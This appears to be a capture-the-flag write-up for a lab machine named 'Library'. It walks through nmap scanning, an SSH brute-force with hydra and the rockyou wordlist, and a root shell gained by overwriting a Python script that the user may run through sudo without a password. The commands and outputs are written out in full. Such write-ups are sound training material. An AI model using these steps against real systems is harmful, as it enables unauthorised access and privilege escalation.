Library
1. Reconnaissance and Enumeration
1.1. Initial Port Scan
export TARGET_IP=10.10.37.96 # Set the target IP as an environment variable for convenience.
nmap -p- --min-rate 5000 $TARGET_IP
Results:
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1.2. Web Enumeration
We further investigate the web server running on port 80.
-
Direct Access: Browsing to
http://10.10.37.96/
reveals a blog post authored by "meliodas". This is a potential username for later use. -
robots.txt Analysis: Examining
http://10.10.37.96/robots.txt
reveals the following:User-agent: rockyou
Interpretation: This is a strong hint. It implies that we should use the
rockyou.txt
wordlist, likely against the SSH service, given the potential username "meliodas".
2. Exploitation: SSH Brute-Force
hydra -V -l "meliodas" -P /usr/share/wordlists/rockyou.txt ssh://$TARGET_IP -f
Results:
[22][ssh] host: 10.10.37.96 login: meliodas password: iloveyou1
Success: hydra
successfully identifies the password "iloveyou1" for the user "meliodas".
3. Privilege Escalation
3.1. Initial Shell and Enumeration
We log in to the target machine using the discovered credentials:
ssh meliodas@10.10.37.96 # Password: iloveyou1
Once logged in, we perform basic system enumeration:
id
Output:
uid=1000(meliodas) gid=1000(meliodas) groups=1000(meliodas),4(adm),24(cdrom),30(dip),46(plugdev),114(lpadmin),115(sambashare)
sudo -l
Output:
(ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
sudo -l
: Lists the commands that "meliodas" can run withsudo
(superuser privileges). Crucially, the output shows that "meliodas" can execute/usr/bin/python* /home/meliodas/bak.py
as root without a password (NOPASSWD). This is a significant misconfiguration and our path to privilege escalation.
3.2. Exploiting the Python Script
We examine the bak.py
script:
cat /home/meliodas/bak.py
#!/usr/bin/env python
import os
import zipfile
def zipdir(path, ziph):
for root, dirs, files in os.walk(path):
for file in files:
ziph.write(os.path.join(root, file))
if __name__ == '__main__':
zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
zipdir('/var/www/html', zipf)
zipf.close()
3.3. Gaining Root Access
We replace the bak.py
script with a simple command to spawn a root shell:
rm /home/meliodas/bak.py
echo 'import pty; pty.spawn("/bin/sh")' > /home/meliodas/bak.py
Explanation of Payload:
import pty
: Imports thepty
module, which is used to create pseudo-terminals. This is a more reliable way to get a shell than simply usingos.system
.pty.spawn("/bin/sh")
: Spawns a new shell (/bin/sh
) within a pseudo-terminal.
Now, we execute the modified script using sudo
:
sudo /usr/bin/python /home/meliodas/bak.py
id
Output
uid=0(root) gid=0(root) groups=0(root)
Success! We have obtained a root shell. The id
command confirms that we are now running as the root
user (UID 0).